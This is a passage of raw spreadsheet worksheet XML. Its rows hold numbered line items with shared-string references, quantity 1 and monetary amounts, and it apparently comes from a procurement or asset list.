      <c r="F131" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G131" s="36">
        <v>1</v>
      </c>
      <c r="H131" s="257" t="s">
        <v>1230</v>
      </c>
      <c r="I131" s="67">
        <v>15897.44</v>
      </c>
      <c r="J131" s="50">
        <v>8640</v>
      </c>
      <c r="K131" s="259" t="s">
        <v>4461</v>
      </c>
      <c r="L131" s="25"/>
      <c r="M131" s="25"/>
      <c r="N131" s="47"/>
      <c r="O131" s="47"/>
      <c r="P131" s="47"/>
      <c r="Q131" s="47"/>
      <c r="R131" s="47"/>
      <c r="S131" s="47"/>
      <c r="T131" s="47"/>
      <c r="U131" s="47"/>
      <c r="V131" s="47"/>
      <c r="W131" s="47"/>
      <c r="X131" s="47"/>
      <c r="Y131" s="47"/>
      <c r="Z131" s="47"/>
      <c r="AA131" s="47"/>
      <c r="AB131" s="47"/>
      <c r="AC131" s="47"/>
      <c r="AD131" s="47"/>
      <c r="AE131" s="47"/>
      <c r="AF131" s="47"/>
      <c r="AG131" s="47"/>
    </row>
    <row r="132" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A132" s="25"/>
      <c r="B132" s="23">
        <v>255</v>
      </c>
      <c r="C132" s="257" t="s">
        <v>4462</v>
      </c>
      <c r="D132" s="258" t="s">
        <v>4463</v>
      </c>
      <c r="E132" s="258" t="s">
        <v>4464</v>
      </c>
      <c r="F132" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G132" s="36">
        <v>1</v>
      </c>
      <c r="H132" s="257" t="s">
        <v>4465</v>
      </c>
      <c r="I132" s="67">
        <v>11538.46</v>
      </c>
      <c r="J132" s="50">
        <v>63360</v>
      </c>
      <c r="K132" s="259" t="s">
        <v>4466</v>
      </c>
      <c r="L132" s="25"/>
      <c r="M132" s="25"/>
      <c r="N132" s="47"/>
      <c r="O132" s="47"/>
      <c r="P132" s="47"/>
      <c r="Q132" s="47"/>
      <c r="R132" s="47"/>
      <c r="S132" s="47"/>
      <c r="T132" s="47"/>
      <c r="U132" s="47"/>
      <c r="V132" s="47"/>
      <c r="W132" s="47"/>
      <c r="X132" s="47"/>
      <c r="Y132" s="47"/>
      <c r="Z132" s="47"/>
      <c r="AA132" s="47"/>
      <c r="AB132" s="47"/>
      <c r="AC132" s="47"/>
      <c r="AD132" s="47"/>
      <c r="AE132" s="47"/>
      <c r="AF132" s="47"/>
      <c r="AG132" s="47"/>
    </row>
    <row r="133" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A133" s="25"/>
      <c r="B133" s="72" t="s">
        <v>4467</v>
      </c>
      <c r="C133" s="72"/>
      <c r="D133" s="72"/>
      <c r="E133" s="72"/>
      <c r="F133" s="36"/>
      <c r="G133" s="73"/>
      <c r="J133" s="50">
        <v>0</v>
      </c>
      <c r="L133" s="25"/>
      <c r="M133" s="25"/>
      <c r="N133" s="47"/>
      <c r="O133" s="47"/>
      <c r="P133" s="47"/>
      <c r="Q133" s="47"/>
      <c r="R133" s="47"/>
      <c r="S133" s="47"/>
      <c r="T133" s="47"/>
      <c r="U133" s="47"/>
      <c r="V133" s="47"/>
      <c r="W133" s="47"/>
      <c r="X133" s="47"/>
      <c r="Y133" s="47"/>
      <c r="Z133" s="47"/>
      <c r="AA133" s="47"/>
      <c r="AB133" s="47"/>
      <c r="AC133" s="47"/>
      <c r="AD133" s="47"/>
      <c r="AE133" s="47"/>
      <c r="AF133" s="47"/>
      <c r="AG133" s="47"/>
    </row>
    <row r="134" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A134" s="25"/>
      <c r="B134" s="36">
        <v>256</v>
      </c>
      <c r="C134" s="36"/>
      <c r="D134" s="63" t="s">
        <v>4468</v>
      </c>
      <c r="E134" s="63"/>
      <c r="F134" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G134" s="26">
        <v>1</v>
      </c>
      <c r="H134" s="26"/>
      <c r="I134" s="75"/>
      <c r="J134" s="50">
        <v>31200</v>
      </c>
      <c r="L134" s="25"/>
      <c r="M134" s="25"/>
      <c r="N134" s="47"/>
      <c r="O134" s="47"/>
      <c r="P134" s="47"/>
      <c r="Q134" s="47"/>
      <c r="R134" s="47"/>
      <c r="S134" s="47"/>
      <c r="T134" s="47"/>
      <c r="U134" s="47"/>
      <c r="V134" s="47"/>
      <c r="W134" s="47"/>
      <c r="X134" s="47"/>
      <c r="Y134" s="47"/>
      <c r="Z134" s="47"/>
      <c r="AA134" s="47"/>
      <c r="AB134" s="47"/>
      <c r="AC134" s="47"/>
      <c r="AD134" s="47"/>
      <c r="AE134" s="47"/>
      <c r="AF134" s="47"/>
      <c r="AG134" s="47"/>
    </row>
    <row r="135" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A135" s="25"/>
      <c r="B135" s="36">
        <v>257</v>
      </c>
      <c r="C135" s="36"/>
      <c r="D135" s="63" t="s">
        <v>1103</v>
      </c>
      <c r="E135" s="63"/>
      <c r="F135" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G135" s="26">
        <v>1</v>
      </c>
      <c r="H135" s="26"/>
      <c r="I135" s="75"/>
      <c r="J135" s="50">
        <v>19200</v>
      </c>
      <c r="L135" s="25"/>
      <c r="M135" s="25"/>
      <c r="N135" s="47"/>
      <c r="O135" s="47"/>
      <c r="P135" s="47"/>
      <c r="Q135" s="47"/>
      <c r="R135" s="47"/>
      <c r="S135" s="47"/>
      <c r="T135" s="47"/>
      <c r="U135" s="47"/>
      <c r="V135" s="47"/>
      <c r="W135" s="47"/>
      <c r="X135" s="47"/>
      <c r="Y135" s="47"/>
      <c r="Z135" s="47"/>
      <c r="AA135" s="47"/>
      <c r="AB135" s="47"/>
      <c r="AC135" s="47"/>
      <c r="AD135" s="47"/>
      <c r="AE135" s="47"/>
      <c r="AF135" s="47"/>
      <c r="AG135" s="47"/>
    </row>
    <row r="136" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A136" s="25"/>
      <c r="B136" s="36">
        <v>258</v>
      </c>
      <c r="C136" s="36"/>
      <c r="D136" s="63" t="s">
        <v>4469</v>
      </c>
      <c r="E136" s="63" t="s">
        <v>4470</v>
      </c>
      <c r="F136" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G136" s="26">
        <v>1</v>
      </c>
      <c r="H136" s="26"/>
      <c r="I136" s="75"/>
      <c r="J136" s="50">
        <v>1200</v>
      </c>
      <c r="L136" s="25"/>
      <c r="M136" s="25"/>
      <c r="N136" s="47"/>
      <c r="O136" s="47"/>
      <c r="P136" s="47"/>
      <c r="Q136" s="47"/>
      <c r="R136" s="47"/>
      <c r="S136" s="47"/>
      <c r="T136" s="47"/>
      <c r="U136" s="47"/>
      <c r="V136" s="47"/>
      <c r="W136" s="47"/>
      <c r="X136" s="47"/>
      <c r="Y136" s="47"/>
      <c r="Z136" s="47"/>
      <c r="AA136" s="47"/>
      <c r="AB136" s="47"/>
      <c r="AC136" s="47"/>
      <c r="AD136" s="47"/>
      <c r="AE136" s="47"/>
      <c r="AF136" s="47"/>
      <c r="AG136" s="47"/>
    </row>
    <row r="137" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A137" s="25"/>
      <c r="B137" s="36">
        <v>259</v>
      </c>
      <c r="C137" s="36"/>
      <c r="D137" s="63" t="s">
        <v>4471</v>
      </c>
      <c r="E137" s="63"/>
      <c r="F137" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G137" s="26">
        <v>1</v>
      </c>
      <c r="H137" s="26"/>
      <c r="I137" s="26"/>
      <c r="J137" s="50">
        <v>4800</v>
      </c>
      <c r="L137" s="25"/>
      <c r="M137" s="25"/>
      <c r="N137" s="47"/>
      <c r="O137" s="47"/>
      <c r="P137" s="47"/>
      <c r="Q137" s="47"/>
      <c r="R137" s="47"/>
      <c r="S137" s="47"/>
      <c r="T137" s="47"/>
      <c r="U137" s="47"/>
      <c r="V137" s="47"/>
      <c r="W137" s="47"/>
      <c r="X137" s="47"/>
      <c r="Y137" s="47"/>
      <c r="Z137" s="47"/>
      <c r="AA137" s="47"/>
      <c r="AB137" s="47"/>
      <c r="AC137" s="47"/>
      <c r="AD137" s="47"/>
      <c r="AE137" s="47"/>
      <c r="AF137" s="47"/>
      <c r="AG137" s="47"/>
    </row>
    <row r="138" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A138" s="25"/>
      <c r="B138" s="36">
        <v>260</v>
      </c>
      <c r="C138" s="36"/>
      <c r="D138" s="63" t="s">
        <v>4472</v>
      </c>
      <c r="E138" s="63" t="s">
        <v>4473</v>
      </c>
      <c r="F138" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G138" s="26">
        <v>1</v>
      </c>
      <c r="H138" s="26"/>
      <c r="I138" s="26"/>
      <c r="J138" s="50">
        <v>840</v>
      </c>
      <c r="L138" s="25"/>
      <c r="M138" s="25"/>
      <c r="N138" s="47"/>
      <c r="O138" s="47"/>
      <c r="P138" s="47"/>
      <c r="Q138" s="47"/>
      <c r="R138" s="47"/>
      <c r="S138" s="47"/>
      <c r="T138" s="47"/>
      <c r="U138" s="47"/>
      <c r="V138" s="47"/>
      <c r="W138" s="47"/>
      <c r="X138" s="47"/>
      <c r="Y138" s="47"/>
      <c r="Z138" s="47"/>
      <c r="AA138" s="47"/>
      <c r="AB138" s="47"/>
      <c r="AC138" s="47"/>
      <c r="AD138" s="47"/>
      <c r="AE138" s="47"/>
      <c r="AF138" s="47"/>
      <c r="AG138" s="47"/>
    </row>
    <row r="139" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A139" s="25"/>
      <c r="B139" s="36">
        <v>261</v>
      </c>
      <c r="C139" s="36"/>
      <c r="D139" s="63" t="s">
        <v>4474</v>
      </c>
      <c r="E139" s="63" t="s">
        <v>4475</v>
      </c>
      <c r="F139" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G139" s="26">
        <v>1</v>
      </c>
      <c r="H139" s="26"/>
      <c r="I139" s="26"/>
      <c r="J139" s="50">
        <v>4800</v>
      </c>
      <c r="L139" s="25"/>
      <c r="M139" s="25"/>
      <c r="N139" s="47"/>
      <c r="O139" s="47"/>
      <c r="P139" s="47"/>
      <c r="Q139" s="47"/>
      <c r="R139" s="47"/>
      <c r="S139" s="47"/>
      <c r="T139" s="47"/>
      <c r="U139" s="47"/>
      <c r="V139" s="47"/>
      <c r="W139" s="47"/>
      <c r="X139" s="47"/>
      <c r="Y139" s="47"/>
      <c r="Z139" s="47"/>
      <c r="AA139" s="47"/>
      <c r="AB139" s="47"/>
      <c r="AC139" s="47"/>
      <c r="AD139" s="47"/>
      <c r="AE139" s="47"/>
      <c r="AF139" s="47"/>
      <c r="AG139" s="47"/>
    </row>
    <row r="140" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A140" s="25"/>
      <c r="B140" s="36">
        <v>262</v>
      </c>
      <c r="C140" s="36"/>
      <c r="D140" s="63" t="s">
        <v>4476</v>
      </c>
      <c r="E140" s="63"/>
      <c r="F140" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G140" s="26">
        <v>1</v>
      </c>
      <c r="H140" s="26"/>
      <c r="I140" s="26"/>
      <c r="J140" s="50">
        <v>8400</v>
      </c>
      <c r="L140" s="25"/>
      <c r="M140" s="25"/>
      <c r="N140" s="47"/>
      <c r="O140" s="47"/>
      <c r="P140" s="47"/>
      <c r="Q140" s="47"/>
      <c r="R140" s="47"/>
      <c r="S140" s="47"/>
      <c r="T140" s="47"/>
      <c r="U140" s="47"/>
      <c r="V140" s="47"/>
      <c r="W140" s="47"/>
      <c r="X140" s="47"/>
      <c r="Y140" s="47"/>
      <c r="Z140" s="47"/>
      <c r="AA140" s="47"/>
      <c r="AB140" s="47"/>
      <c r="AC140" s="47"/>
      <c r="AD140" s="47"/>
      <c r="AE140" s="47"/>
      <c r="AF140" s="47"/>
      <c r="AG140" s="47"/>
    </row>
    <row r="141" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A141" s="25"/>
      <c r="B141" s="36">
        <v>263</v>
      </c>
      <c r="C141" s="36"/>
      <c r="D141" s="63" t="s">
        <v>4477</v>
      </c>
      <c r="E141" s="63" t="s">
        <v>4478</v>
      </c>
      <c r="F141" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G141" s="26">
        <v>1</v>
      </c>
      <c r="H141" s="26"/>
      <c r="I141" s="26"/>
      <c r="J141" s="50">
        <v>1920</v>
      </c>
      <c r="L141" s="25"/>
      <c r="M141" s="25"/>
      <c r="N141" s="47"/>
      <c r="O141" s="47"/>
      <c r="P141" s="47"/>
      <c r="Q141" s="47"/>
      <c r="R141" s="47"/>
      <c r="S141" s="47"/>
      <c r="T141" s="47"/>
      <c r="U141" s="47"/>
      <c r="V141" s="47"/>
      <c r="W141" s="47"/>
      <c r="X141" s="47"/>
      <c r="Y141" s="47"/>
      <c r="Z141" s="47"/>
      <c r="AA141" s="47"/>
      <c r="AB141" s="47"/>
      <c r="AC141" s="47"/>
      <c r="AD141" s="47"/>
      <c r="AE141" s="47"/>
      <c r="AF141" s="47"/>
      <c r="AG141" s="47"/>
    </row>
    <row r="142" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A142" s="25"/>
      <c r="B142" s="36">
        <v>264</v>
      </c>
      <c r="C142" s="36"/>
      <c r="D142" s="63" t="s">
        <v>4479</v>
      </c>
      <c r="E142" s="63"/>
      <c r="F142" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G142" s="26">
        <v>1</v>
      </c>
      <c r="H142" s="26"/>
      <c r="I142" s="26"/>
      <c r="J142" s="50">
        <v>12000</v>
      </c>
      <c r="K142" s="26"/>
      <c r="L142" s="25"/>
      <c r="M142" s="25"/>
      <c r="N142" s="47"/>
      <c r="O142" s="47"/>
      <c r="P142" s="47"/>
      <c r="Q142" s="47"/>
      <c r="R142" s="47"/>
      <c r="S142" s="47"/>
      <c r="T142" s="47"/>
      <c r="U142" s="47"/>
      <c r="V142" s="47"/>
      <c r="W142" s="47"/>
      <c r="X142" s="47"/>
      <c r="Y142" s="47"/>
      <c r="Z142" s="47"/>
      <c r="AA142" s="47"/>
      <c r="AB142" s="47"/>
      <c r="AC142" s="47"/>
      <c r="AD142" s="47"/>
      <c r="AE142" s="47"/>
      <c r="AF142" s="47"/>
      <c r="AG142" s="47"/>
    </row>
    <row r="143" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A143" s="25"/>
      <c r="B143" s="36">
        <v>265</v>
      </c>
      <c r="C143" s="36"/>
      <c r="D143" s="63" t="s">
        <v>4480</v>
      </c>
      <c r="E143" s="63"/>
      <c r="F143" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G143" s="26">
        <v>1</v>
      </c>
      <c r="H143" s="26"/>
      <c r="I143" s="26"/>
      <c r="J143" s="50">
        <v>96000</v>
      </c>
      <c r="K143" s="26" t="s">
        <v>4481</v>
      </c>
      <c r="L143" s="25"/>
      <c r="M143" s="25"/>
      <c r="N143" s="47"/>
      <c r="O143" s="47"/>
      <c r="P143" s="47"/>
      <c r="Q143" s="47"/>
      <c r="R143" s="47"/>
      <c r="S143" s="47"/>
      <c r="T143" s="47"/>
      <c r="U143" s="47"/>
      <c r="V143" s="47"/>
      <c r="W143" s="47"/>
      <c r="X143" s="47"/>
      <c r="Y143" s="47"/>
      <c r="Z143" s="47"/>
      <c r="AA143" s="47"/>
      <c r="AB143" s="47"/>
      <c r="AC143" s="47"/>
      <c r="AD143" s="47"/>
      <c r="AE143" s="47"/>
      <c r="AF143" s="47"/>
      <c r="AG143" s="47"/>
    </row>
    <row r="144" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A144" s="25"/>
      <c r="B144" s="36">
        <v>266</v>
      </c>
      <c r="C144" s="36"/>
      <c r="D144" s="63" t="s">
        <v>4482</v>
      </c>
      <c r="E144" s="63" t="s">
        <v>4483</v>
      </c>
      <c r="F144" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G144" s="26">
        <v>1</v>
      </c>
      <c r="H144" s="26"/>
      <c r="I144" s="26"/>
      <c r="J144" s="50">
        <v>1200</v>
      </c>
      <c r="K144" s="26"/>
      <c r="L144" s="25"/>
      <c r="M144" s="25"/>
      <c r="N144" s="47"/>
      <c r="O144" s="47"/>
      <c r="P144" s="47"/>
      <c r="Q144" s="47"/>
      <c r="R144" s="47"/>
      <c r="S144" s="47"/>
      <c r="T144" s="47"/>
      <c r="U144" s="47"/>
      <c r="V144" s="47"/>
      <c r="W144" s="47"/>
      <c r="X144" s="47"/>
      <c r="Y144" s="47"/>
      <c r="Z144" s="47"/>
      <c r="AA144" s="47"/>
      <c r="AB144" s="47"/>
      <c r="AC144" s="47"/>
      <c r="AD144" s="47"/>
      <c r="AE144" s="47"/>
      <c r="AF144" s="47"/>
      <c r="AG144" s="47"/>
    </row>
    <row r="145" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A145" s="25"/>
      <c r="B145" s="36">
        <v>267</v>
      </c>
      <c r="C145" s="36"/>
      <c r="D145" s="66" t="s">
        <v>4484</v>
      </c>
      <c r="E145" s="66" t="s">
        <v>4485</v>
      </c>
      <c r="F145" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G145" s="23">
        <v>1</v>
      </c>
      <c r="H145" s="36"/>
      <c r="I145" s="76"/>
      <c r="J145" s="50">
        <v>1440</v>
      </c>
      <c r="K145" s="26"/>
      <c r="L145" s="25"/>
      <c r="M145" s="25"/>
      <c r="N145" s="47"/>
      <c r="O145" s="47"/>
      <c r="P145" s="47"/>
      <c r="Q145" s="47"/>
      <c r="R145" s="47"/>
      <c r="S145" s="47"/>
      <c r="T145" s="47"/>
      <c r="U145" s="47"/>
      <c r="V145" s="47"/>
      <c r="W145" s="47"/>
      <c r="X145" s="47"/>
      <c r="Y145" s="47"/>
      <c r="Z145" s="47"/>
      <c r="AA145" s="47"/>
      <c r="AB145" s="47"/>
      <c r="AC145" s="47"/>
      <c r="AD145" s="47"/>
      <c r="AE145" s="47"/>
      <c r="AF145" s="47"/>
      <c r="AG145" s="47"/>
    </row>
    <row r="146" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A146" s="25"/>
      <c r="B146" s="36">
        <v>268</v>
      </c>
      <c r="C146" s="36"/>
      <c r="D146" s="63" t="s">
        <v>1092</v>
      </c>
      <c r="E146" s="63" t="s">
        <v>4486</v>
      </c>
      <c r="F146" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G146" s="26">
        <v>1</v>
      </c>
      <c r="H146" s="26"/>
      <c r="I146" s="75"/>
      <c r="J146" s="50">
        <v>1920</v>
      </c>
      <c r="L146" s="25"/>
      <c r="M146" s="25"/>
      <c r="N146" s="47"/>
      <c r="O146" s="47"/>
      <c r="P146" s="47"/>
      <c r="Q146" s="47"/>
      <c r="R146" s="47"/>
      <c r="S146" s="47"/>
      <c r="T146" s="47"/>
      <c r="U146" s="47"/>
      <c r="V146" s="47"/>
      <c r="W146" s="47"/>
      <c r="X146" s="47"/>
      <c r="Y146" s="47"/>
      <c r="Z146" s="47"/>
      <c r="AA146" s="47"/>
      <c r="AB146" s="47"/>
      <c r="AC146" s="47"/>
      <c r="AD146" s="47"/>
      <c r="AE146" s="47"/>
      <c r="AF146" s="47"/>
      <c r="AG146" s="47"/>
    </row>
    <row r="147" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A147" s="25"/>
      <c r="B147" s="72" t="s">
        <v>4487</v>
      </c>
      <c r="C147" s="72"/>
      <c r="D147" s="72"/>
      <c r="E147" s="72"/>
      <c r="F147" s="36"/>
      <c r="G147" s="26"/>
      <c r="H147" s="26"/>
      <c r="I147" s="75"/>
      <c r="J147" s="50">
        <v>0</v>
      </c>
      <c r="L147" s="25"/>
      <c r="M147" s="25"/>
      <c r="N147" s="47"/>
      <c r="O147" s="47"/>
      <c r="P147" s="47"/>
      <c r="Q147" s="47"/>
      <c r="R147" s="47"/>
      <c r="S147" s="47"/>
      <c r="T147" s="47"/>
      <c r="U147" s="47"/>
      <c r="V147" s="47"/>
      <c r="W147" s="47"/>
      <c r="X147" s="47"/>
      <c r="Y147" s="47"/>
      <c r="Z147" s="47"/>
      <c r="AA147" s="47"/>
      <c r="AB147" s="47"/>
      <c r="AC147" s="47"/>
      <c r="AD147" s="47"/>
      <c r="AE147" s="47"/>
      <c r="AF147" s="47"/>
      <c r="AG147" s="47"/>
    </row>
    <row r="148" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A148" s="25"/>
      <c r="B148" s="36">
        <v>273</v>
      </c>
      <c r="C148" s="36"/>
      <c r="D148" s="63" t="s">
        <v>4488</v>
      </c>
      <c r="E148" s="63" t="s">
        <v>4489</v>
      </c>
      <c r="F148" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G148" s="26">
        <v>1</v>
      </c>
      <c r="H148" s="26"/>
      <c r="I148" s="26"/>
      <c r="J148" s="50">
        <v>360</v>
      </c>
      <c r="K148" s="26"/>
      <c r="L148" s="25"/>
      <c r="M148" s="25"/>
      <c r="N148" s="47"/>
      <c r="O148" s="47"/>
      <c r="P148" s="47"/>
      <c r="Q148" s="47"/>
      <c r="R148" s="47"/>
      <c r="S148" s="47"/>
      <c r="T148" s="47"/>
      <c r="U148" s="47"/>
      <c r="V148" s="47"/>
      <c r="W148" s="47"/>
      <c r="X148" s="47"/>
      <c r="Y148" s="47"/>
      <c r="Z148" s="47"/>
      <c r="AA148" s="47"/>
      <c r="AB148" s="47"/>
      <c r="AC148" s="47"/>
      <c r="AD148" s="47"/>
      <c r="AE148" s="47"/>
      <c r="AF148" s="47"/>
      <c r="AG148" s="47"/>
    </row>
    <row r="149" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A149" s="25"/>
      <c r="B149" s="36">
        <v>275</v>
      </c>
      <c r="C149" s="36"/>
      <c r="D149" s="63" t="s">
        <v>4490</v>
      </c>
      <c r="E149" s="63" t="s">
        <v>4491</v>
      </c>
      <c r="F149" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G149" s="26">
        <v>1</v>
      </c>
      <c r="H149" s="26"/>
      <c r="I149" s="26"/>
      <c r="J149" s="50">
        <v>1200</v>
      </c>
      <c r="K149" s="26"/>
      <c r="L149" s="25"/>
      <c r="M149" s="25"/>
      <c r="N149" s="47"/>
      <c r="O149" s="47"/>
      <c r="P149" s="47"/>
      <c r="Q149" s="47"/>
      <c r="R149" s="47"/>
      <c r="S149" s="47"/>
      <c r="T149" s="47"/>
      <c r="U149" s="47"/>
      <c r="V149" s="47"/>
      <c r="W149" s="47"/>
      <c r="X149" s="47"/>
      <c r="Y149" s="47"/>
      <c r="Z149" s="47"/>
      <c r="AA149" s="47"/>
      <c r="AB149" s="47"/>
      <c r="AC149" s="47"/>
      <c r="AD149" s="47"/>
      <c r="AE149" s="47"/>
      <c r="AF149" s="47"/>
      <c r="AG149" s="47"/>
    </row>
    <row r="150" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A150" s="25"/>
      <c r="B150" s="36">
        <v>276</v>
      </c>
      <c r="C150" s="36"/>
      <c r="D150" s="66" t="s">
        <v>4482</v>
      </c>
      <c r="E150" s="66" t="s">
        <v>4492</v>
      </c>
      <c r="F150" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G150" s="23">
        <v>1</v>
      </c>
      <c r="H150" s="36"/>
      <c r="I150" s="76"/>
      <c r="J150" s="50">
        <v>960</v>
      </c>
      <c r="K150" s="26"/>
      <c r="L150" s="25"/>
      <c r="M150" s="25"/>
      <c r="N150" s="47"/>
      <c r="O150" s="47"/>
      <c r="P150" s="47"/>
      <c r="Q150" s="47"/>
      <c r="R150" s="47"/>
      <c r="S150" s="47"/>
      <c r="T150" s="47"/>
      <c r="U150" s="47"/>
      <c r="V150" s="47"/>
      <c r="W150" s="47"/>
      <c r="X150" s="47"/>
      <c r="Y150" s="47"/>
      <c r="Z150" s="47"/>
      <c r="AA150" s="47"/>
      <c r="AB150" s="47"/>
      <c r="AC150" s="47"/>
      <c r="AD150" s="47"/>
      <c r="AE150" s="47"/>
      <c r="AF150" s="47"/>
      <c r="AG150" s="47"/>
    </row>
    <row r="151" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A151" s="25"/>
      <c r="B151" s="36">
        <v>277</v>
      </c>
      <c r="C151" s="36"/>
      <c r="D151" s="63" t="s">
        <v>4493</v>
      </c>
      <c r="E151" s="63" t="s">
        <v>4494</v>
      </c>
      <c r="F151" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G151" s="26">
        <v>1</v>
      </c>
      <c r="H151" s="26"/>
      <c r="I151" s="75"/>
      <c r="J151" s="50">
        <v>840</v>
      </c>
      <c r="L151" s="25"/>
      <c r="M151" s="25"/>
      <c r="N151" s="47"/>
      <c r="O151" s="47"/>
      <c r="P151" s="47"/>
      <c r="Q151" s="47"/>
      <c r="R151" s="47"/>
      <c r="S151" s="47"/>
      <c r="T151" s="47"/>
      <c r="U151" s="47"/>
      <c r="V151" s="47"/>
      <c r="W151" s="47"/>
      <c r="X151" s="47"/>
      <c r="Y151" s="47"/>
      <c r="Z151" s="47"/>
      <c r="AA151" s="47"/>
      <c r="AB151" s="47"/>
      <c r="AC151" s="47"/>
      <c r="AD151" s="47"/>
      <c r="AE151" s="47"/>
      <c r="AF151" s="47"/>
      <c r="AG151" s="47"/>
    </row>
    <row r="152" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A152" s="25"/>
      <c r="B152" s="36">
        <v>278</v>
      </c>
      <c r="C152" s="36"/>
      <c r="D152" s="63" t="s">
        <v>4223</v>
      </c>
      <c r="E152" s="63" t="s">
        <v>4495</v>
      </c>
      <c r="F152" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G152" s="23">
        <v>1</v>
      </c>
      <c r="H152" s="26"/>
      <c r="I152" s="75"/>
      <c r="J152" s="50">
        <v>6000</v>
      </c>
      <c r="L152" s="25"/>
      <c r="M152" s="25"/>
      <c r="N152" s="47"/>
      <c r="O152" s="47"/>
      <c r="P152" s="47"/>
      <c r="Q152" s="47"/>
      <c r="R152" s="47"/>
      <c r="S152" s="47"/>
      <c r="T152" s="47"/>
      <c r="U152" s="47"/>
      <c r="V152" s="47"/>
      <c r="W152" s="47"/>
      <c r="X152" s="47"/>
      <c r="Y152" s="47"/>
      <c r="Z152" s="47"/>
      <c r="AA152" s="47"/>
      <c r="AB152" s="47"/>
      <c r="AC152" s="47"/>
      <c r="AD152" s="47"/>
      <c r="AE152" s="47"/>
      <c r="AF152" s="47"/>
      <c r="AG152" s="47"/>
    </row>
    <row r="153" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A153" s="25"/>
      <c r="B153" s="36">
        <v>279</v>
      </c>
      <c r="C153" s="36"/>
      <c r="D153" s="63" t="s">
        <v>4496</v>
      </c>
      <c r="E153" s="63" t="s">
        <v>4497</v>
      </c>
      <c r="F153" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G153" s="26">
        <v>1</v>
      </c>
      <c r="H153" s="26"/>
      <c r="I153" s="75"/>
      <c r="J153" s="50">
        <v>6000</v>
      </c>
      <c r="L153" s="25"/>
      <c r="M153" s="25"/>
      <c r="N153" s="47"/>
      <c r="O153" s="47"/>
      <c r="P153" s="47"/>
      <c r="Q153" s="47"/>
      <c r="R153" s="47"/>
      <c r="S153" s="47"/>
      <c r="T153" s="47"/>
      <c r="U153" s="47"/>
      <c r="V153" s="47"/>
      <c r="W153" s="47"/>
      <c r="X153" s="47"/>
      <c r="Y153" s="47"/>
      <c r="Z153" s="47"/>
      <c r="AA153" s="47"/>
      <c r="AB153" s="47"/>
      <c r="AC153" s="47"/>
      <c r="AD153" s="47"/>
      <c r="AE153" s="47"/>
      <c r="AF153" s="47"/>
      <c r="AG153" s="47"/>
    </row>
    <row r="154" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A154" s="25"/>
      <c r="B154" s="36">
        <v>281</v>
      </c>
      <c r="C154" s="36"/>
      <c r="D154" s="63" t="s">
        <v>4166</v>
      </c>
      <c r="E154" s="63" t="s">
        <v>4381</v>
      </c>
      <c r="F154" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G154" s="26">
        <v>1</v>
      </c>
      <c r="H154" s="26"/>
      <c r="I154" s="26"/>
      <c r="J154" s="50">
        <v>3360</v>
      </c>
      <c r="L154" s="25"/>
      <c r="M154" s="25"/>
      <c r="N154" s="47"/>
      <c r="O154" s="47"/>
      <c r="P154" s="47"/>
      <c r="Q154" s="47"/>
      <c r="R154" s="47"/>
      <c r="S154" s="47"/>
      <c r="T154" s="47"/>
      <c r="U154" s="47"/>
      <c r="V154" s="47"/>
      <c r="W154" s="47"/>
      <c r="X154" s="47"/>
      <c r="Y154" s="47"/>
      <c r="Z154" s="47"/>
      <c r="AA154" s="47"/>
      <c r="AB154" s="47"/>
      <c r="AC154" s="47"/>
      <c r="AD154" s="47"/>
      <c r="AE154" s="47"/>
      <c r="AF154" s="47"/>
      <c r="AG154" s="47"/>
    </row>
    <row r="155" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A155" s="25"/>
      <c r="B155" s="36">
        <v>282</v>
      </c>
      <c r="C155" s="36"/>
      <c r="D155" s="63" t="s">
        <v>4166</v>
      </c>
      <c r="E155" s="63" t="s">
        <v>2528</v>
      </c>
      <c r="F155" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G155" s="23">
        <v>1</v>
      </c>
      <c r="H155" s="26"/>
      <c r="I155" s="26"/>
      <c r="J155" s="50">
        <v>1080</v>
      </c>
      <c r="L155" s="25"/>
      <c r="M155" s="25"/>
      <c r="N155" s="47"/>
      <c r="O155" s="47"/>
      <c r="P155" s="47"/>
      <c r="Q155" s="47"/>
      <c r="R155" s="47"/>
